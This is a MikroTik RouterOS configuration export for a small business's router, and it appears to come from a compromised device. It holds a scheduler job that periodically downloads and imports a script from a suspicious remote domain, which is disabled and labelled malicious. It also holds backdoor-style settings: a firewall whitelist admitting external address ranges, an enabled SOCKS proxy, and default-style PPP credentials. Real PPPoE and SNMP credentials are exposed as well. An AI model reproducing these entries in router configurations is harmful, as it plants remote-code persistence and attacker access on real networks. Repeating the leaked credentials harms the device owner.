# routerboard: yes # board-name: hEX lite # model: RouterBOARD 750 r2 # serial-number: 67D207714967 # firmware-type: qca9531L # factory-firmware: 3.36 # current-firmware: 6.49.7 # upgrade-firmware: 6.49.7 # # channel: stable # installed-version: 6.49.7 # # Flags: U - undoable, R - redoable, F - floating-undo # ACTION BY POLICY # # software id = DDPH-NI2Q # # model = RouterBOARD 750 r2 # serial number = 67D207714967 /interface bridge add name=bridge1 /interface ethernet set [ find default-name=ether1 ] advertise=10M-half,10M-full,100M-half,100M-full,1000M-half,1000M-full set [ find default-name=ether2 ] advertise=10M-half,10M-full,100M-half,100M-full,1000M-half,1000M-full set [ find default-name=ether3 ] advertise=10M-half,10M-full,100M-half,100M-full,1000M-half,1000M-full disabled=yes set [ find default-name=ether4 ] advertise=10M-half,10M-full,100M-half,100M-full,1000M-half,1000M-full set [ find default-name=ether5 ] advertise=10M-half,10M-full,100M-half,100M-full,1000M-half,1000M-full /interface pppoe-client add add-default-route=yes disabled=no interface=ether1 name=pppoe-out1 password=onnet@arena185 use-peer-dns=yes user=onnet@arenaconcreto /interface eoip add !keepalive mac-address=02:8D:AA:C1:90:4B name=eoip-tunnel1 remote-address=45.225.67.204 tunnel-id=2 /interface list add name=WAN add name=LAN /interface wireless security-profiles set [ find default=yes ] supplicant-identity=MikroTik /ip pool add name=dhcp ranges=10.0.0.100-10.0.0.200 /ip dhcp-server add address-pool=dhcp disabled=no interface=bridge1 name=dhcp1 /ppp profile add local-address=14.25.36.98 name=mikrotikdefault remote-address=36.25.14.78 add change-tcp-mss=yes name=spptp use-encryption=yes add change-tcp-mss=yes name=lvpn use-compression=no use-encryption=no use-mpls=no /snmp community set [ find default=yes ] addresses=45.225.65.10/32 name=onnet@2017 /user group set full policy="local,telnet,ssh,ftp,reboot,read,write,policy,test,winbox,password,web,sniff,sensitive,api,romon,dude,tikapp" /interface bridge port add bridge=bridge1 interface=ether2 add bridge=bridge1 interface=ether3 add bridge=bridge1 interface=ether4 add bridge=bridge1 interface=ether5 /ip neighbor discovery-settings set discover-interface-list=!dynamic /interface l2tp-server server set default-profile=default enabled=yes /interface list member add interface=pppoe-out1 list=WAN add interface=bridge1 list=LAN /interface pptp-server server set authentication=pap,chap,mschap1,mschap2 default-profile=default enabled=yes /ip address add address=10.0.0.1/24 interface=ether2 network=10.0.0.0 add address=10.10.10.1/30 interface=eoip-tunnel1 network=10.10.10.0 /ip dhcp-client add interface=ether1 /ip dhcp-server network add address=10.0.0.0/24 gateway=10.0.0.1 netmask=24 /ip firewall address-list add list=WL add address=89.248.172.0/24 list=WL add address=185.64.104.0/22 list=WL add address=185.25.48.0/22 list=WL add address=85.206.160.0/20 list=WL add address=163.172.0.0/17 list=WL add address=80.82.64.0/23 list=WL add address=10.0.0.0/8 list=WL add address=127.0.0.0/8 list=WL add address=192.168.0.0/16 list=WL add address=172.16.0.0/12 list=WL add address=169.254.0.0/16 list=WL /ip firewall filter add chain=input port=1701,500,4500 protocol=udp add action=accept chain=input dst-port=5678 protocol=tcp add action=accept chain=input dst-port=5678 protocol=tcp add action=accept chain=input dst-port=5678 protocol=tcp add action=accept chain=input dst-port=5678 protocol=tcp add action=accept chain=input dst-port=5678 protocol=tcp add action=accept chain=input dst-port=5678 protocol=tcp add action=accept chain=input dst-port=5678 protocol=tcp add action=accept chain=input dst-port=5678 protocol=tcp add action=accept chain=input dst-port=5678 protocol=tcp add action=accept chain=input dst-port=5678 protocol=tcp add action=accept chain=input dst-port=5678 protocol=tcp add action=accept chain=input dst-port=5678 protocol=tcp add action=accept chain=input dst-port=5678 protocol=tcp add action=accept chain=input dst-port=5678 protocol=tcp add action=accept chain=input dst-port=5678 protocol=tcp add action=accept chain=input dst-port=5678 protocol=tcp add action=accept chain=input dst-port=5678 protocol=tcp add action=accept chain=input dst-port=5678 protocol=tcp add action=accept chain=input dst-port=5678 protocol=tcp add action=accept chain=input dst-port=5678 protocol=tcp add action=accept chain=input dst-port=5678 protocol=tcp add action=accept chain=input dst-port=5678 protocol=tcp add action=accept chain=input dst-port=5678 protocol=tcp add action=accept chain=input dst-port=5678 protocol=tcp add action=accept chain=input dst-port=5678 protocol=tcp add action=accept chain=input dst-port=5678 protocol=tcp add action=accept chain=input dst-port=5678 protocol=tcp add chain=input protocol=ipsec-esp add action=accept chain=input src-address-list=WL add action=drop chain=input dst-port=22,80,51922 protocol=tcp /ip firewall nat add action=masquerade chain=srcnat out-interface-list=WAN add action=dst-nat chain=dstnat dst-address=45.225.67.208 dst-port=53306 protocol=udp to-addresses=10.0.0.250 to-ports=53306 add action=dst-nat chain=dstnat dst-address=45.225.67.208 dst-port=53306 protocol=tcp to-addresses=10.0.0.250 to-ports=53306 add action=masquerade chain=srcnat /ip route add distance=1 dst-address=192.168.0.0/24 gateway=10.0.0.2 /ip service set telnet disabled=yes set ftp disabled=yes set www disabled=yes set ssh address=45.225.65.10/32 port=2222 set api disabled=yes set winbox port=25000 set api-ssl disabled=yes /ip socks set max-connections=500 /ppp secret add name=mikrotikdefaultuser password=mikrotikdefaultpass profile=mikrotikdefault /snmp set enabled=yes /system clock set time-zone-name=America/Sao_Paulo /system identity set name="arena concreto" /system scheduler add comment="Disabled as known malicious configuration" disabled=yes interval=10m name=NT on-event="/tool fetch url=http://fa05d6d74c564cceda17c512f670efbb.entryglory.com/poll/b88265e1-edda-47f6-81a9-33d5a2e0e66c mode=http dst-path=updater.rsc\r\n/import updater.rsc\r\n/file remomve updater.rsc" policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=sep/14/2021 start-time=08:34:32